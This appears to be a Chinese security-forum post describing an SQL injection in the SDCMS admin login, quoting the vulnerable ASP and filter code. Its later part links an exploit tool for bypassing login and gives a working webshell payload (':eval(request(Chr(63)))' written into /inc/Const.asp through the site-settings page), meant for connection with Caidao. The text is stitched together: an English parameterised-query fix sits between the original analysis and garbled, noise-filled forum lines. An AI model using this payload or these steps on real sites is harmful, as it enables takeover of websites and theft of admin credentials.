Author: T00LS 鬼哥
Vulnerable file: <admin directory>/index.asp
Sub Check
    Dim username,password,code,getcode,Rs
    IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
    username=FilterText(Trim(Request.Form("username")),1)
    password=FilterText(Trim(Request.Form("password")),1)
    code=Trim(Request.Form("yzm"))
    getcode=Session("SDCMSCode")
    IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
    IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)":died
    IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)":died
    IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)":died
    IF username="" or password="" Then
        Echo "用户名或密码不能为空":died
    Else
        'username is concatenated straight into the SQL string
        Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
        IF Rs.Eof Then
            AddLog username,GetIp,"登录失败",1
            Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
        Else
            Add_Cookies "sdcms_id",Rs(0)
            Add_Cookies "sdcms_name",username
            Add_Cookies "sdcms_pwd",Rs(2)
            Add_Cookies "sdcms_admin",Rs(3)
            Add_Cookies "sdcms_alllever",Rs(4)
            Add_Cookies "sdcms_infolever",Rs(5)
            Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
            AddLog username,GetIp,"登录成功",1
            'Automatically delete log records older than 30 days
            IF Sdcms_DataType Then
                Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
            Else
                Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
            End IF
            Go("sdcms_index.asp")
        End IF
        Rs.Close
        Set Rs=Nothing
    End IF
End Sub
We can see that username is filtered through FilterText. Let's look at the FilterText code:
Function FilterText(ByVal t0,ByVal t1)
    IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
    t0=Trim(t0)
    Select Case t1
        Case "1"
            t0=Replace(t0,Chr(32),"")
            t0=Replace(t0,Chr(13),"")
            t0=Replace(t0,Chr(10)&Chr(10),"")
            t0=Replace(t0,Chr(10),"")
        Case "2"
            t0=Replace(t0,Chr(8),"")   'backspace
            t0=Replace(t0,Chr(9),"")   'tab (horizontal tab)
            t0=Replace(t0,Chr(10),"")  'line feed
            t0=Replace(t0,Chr(11),"")  'vertical tab
            t0=Replace(t0,Chr(12),"")  'form feed
            t0=Replace(t0,Chr(13),"")  'carriage return; chr(13)&chr(10) is the CR+LF pair
            t0=Replace(t0,Chr(22),"")
            t0=Replace(t0,Chr(32),"")  'space
            t0=Replace(t0,Chr(33),"")  '!
            t0=Replace(t0,Chr(34),"")  '"
            t0=Replace(t0,Chr(35),"")  '#
            t0=Replace(t0,Chr(36),"")  '$
            t0=Replace(t0,Chr(37),"")  '%
            t0=Replace(t0,Chr(38),"")  '&
            t0=Replace(t0,Chr(39),"")  ''
            t0=Replace(t0,Chr(40),"")  '(
            t0=Replace(t0,Chr(41),"")  ')
            t0=Replace(t0,Chr(42),"")  '*
            t0=Replace(t0,Chr(43),"")  '+
            t0=Replace(t0,Chr(44),"")  ',
            t0=Replace(t0,Chr(45),"")  '-
            t0=Replace(t0,Chr(46),"")  '.
            t0=Replace(t0,Chr(47),"")  '/
            t0=Replace(t0,Chr(58),"")  ':
            t0=Replace(t0,Chr(59),"")  ';
            t0=Replace(t0,Chr(60),"")  '<
            t0=Replace(t0,Chr(61),"")  '=
            t0=Replace(t0,Chr(62),"")  '>
            t0=Replace(t0,Chr(63),"")  '?
            t0=Replace(t0,Chr(64),"")  '@
            t0=Replace(t0,Chr(91),"")  '[
            t0=Replace(t0,Chr(92),"")  '\
            t0=Replace(t0,Chr(93),"")  ']
            t0=Replace(t0,Chr(94),"")  '^
            t0=Replace(t0,Chr(95),"")  '_
            t0=Replace(t0,Chr(96),"")  '`
            t0=Replace(t0,Chr(123),"") '{
            t0=Replace(t0,Chr(124),"") '|
            t0=Replace(t0,Chr(125),"") '}
            t0=Replace(t0,Chr(126),"") '~
        Case Else
            'HTML escaping. The forum rendered the entity strings as plain characters;
            'they are restored here as the standard HTML entities (an assumption).
            t0=Replace(t0, "&", "&amp;")
            t0=Replace(t0, "'", "&#39;")
            t0=Replace(t0, """", "&quot;")
            t0=Replace(t0, "<", "&lt;")
            t0=Replace(t0, ">", "&gt;")
    End Select
    IF Instr(Lcase(t0),"expression")>0 Then
        'breaks the CSS keyword with a soft hyphen entity (same restoration assumption as above)
        t0=Replace(t0,"expression","e&#173;xpression", 1, -1, 0)
    End If
    FilterText=t0
End Function
See that? When the parameter is 1, it only filters:
t0=Replace(t0,Chr(32),"")
t0=Replace(t0,Chr(13),"")
t0=Replace(t0,Chr(10)&Chr(10),"")
t0=Replace(t0,Chr(10),"")
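The reason the mode-1 filter does not help is visible above: it strips only space, CR and LF, so a quote character reaches the string-concatenated Select in Sub Check unchanged. The fix is to stop building SQL from strings at all. The following is an added example, not SDCMS's own code: the login lookup and the LastIp update from Sub Check rewritten with ADODB.Command bound parameters. It assumes Conn is the open ADODB.Connection the page's code already uses and that md5() is the page's hashing helper; the NewCommand/FindAdmin/TouchAdminLogin names, the parameter sizes and the 32-character hash length are my assumptions.

```vbscript
' Added example: parameterised replacements for the two string-built queries
' in Sub Check. Not SDCMS code. Assumes Conn (an open ADODB.Connection) and
' md5() exist as on the page; function names and column sizes are assumptions.
Const adCmdText    = 1
Const adParamInput = 1
Const adInteger    = 3
Const adVarChar    = 200

' Build a text command on the shared connection. Each "?" is a bound parameter:
' the provider sends the values separately from the SQL text, so a quote inside
' username is just data and can no longer change the statement.
Function NewCommand(sql)
    Dim cmd
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = Conn
    cmd.CommandType = adCmdText
    cmd.CommandText = sql
    Set NewCommand = cmd
End Function

' Returns a recordset positioned on the matching admin row, or at Eof if none.
Function FindAdmin(username, password)
    Dim cmd
    Set cmd = NewCommand("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever " & _
                         "From Sd_Admin Where Sdcms_Name=? And Sdcms_Pwd=?")
    cmd.Parameters.Append cmd.CreateParameter("name", adVarChar, adParamInput, 50, username)
    cmd.Parameters.Append cmd.CreateParameter("pwd",  adVarChar, adParamInput, 32, md5(password))
    Set FindAdmin = cmd.Execute
End Function

' Same treatment for the post-login update: LastIp was also concatenated in.
Sub TouchAdminLogin(adminId, ip)
    Dim cmd
    Set cmd = NewCommand("Update Sd_Admin Set logintimes=logintimes+1,LastIp=? Where id=?")
    cmd.Parameters.Append cmd.CreateParameter("ip", adVarChar, adParamInput, 45, ip)
    cmd.Parameters.Append cmd.CreateParameter("id", adInteger, adParamInput, , CLng(adminId))
    cmd.Execute
End Sub

' In Sub Check the vulnerable line
'   Set Rs=Conn.Execute("Select ... Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
' becomes
'   Set Rs = FindAdmin(username, password)
' and the update becomes
'   TouchAdminLogin Rs(0), GetIp
```

FilterText can stay for its display role, but nothing in it should be relied on to make SQL safe; that job belongs to the parameter binding. A separate point worth noting from the success branch: it copies Rs(2), the stored password hash, into the sdcms_pwd cookie, so even with the query fixed the credential hash is still being handed to the browser.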
N/ Q$ F2 m7 ^漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
w% ^- }& ^ v- I1 bEXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP5 J; W4 z+ O3 v
6 x/ N* F1 }, P# G0 U' i$ C$ c7 s: C测试:
2 U2 K4 |8 y3 o$ {0 z/ A/ ~/ _: Y) b6 s: C
7 w Y; \; ^. g: v
现在输入工具上验证码,然后点OK
# ~ v9 g5 K1 g& i: D. e- F
0 Z" L: C3 t4 p7 e- d9 ]. {. k2 w
2 E n, O6 a- Q5 q) V/ z% j看到我们直接进入后台管理界面了,呵呵!
2 J$ S3 s. }/ r, j. e; L
- M1 `- X1 {' k( @+ c# {) Z9 n* @% W
8 `. C% ^3 I1 ]' V
这样直接进入后台了。。。。
9 N; F9 m4 o9 d# V6 x: M1 @6 G: P# N7 W4 }* a3 J* G# x% q
1 i; u1 X) t, u4 H
7 q' c) z7 M2 d' E6 r! F9 K2 z( h
SDCMS privilege escalation:

Method 1: open /<admin directory>/sdcms_set.asp and append “:eval(request(Chr(63)))’ after the site name field; that writes a one-liner shell directly. It is written into /inc/Const.asp, and the one-liner's connection password is ?

OK, now connect with Caidao (菜刀)!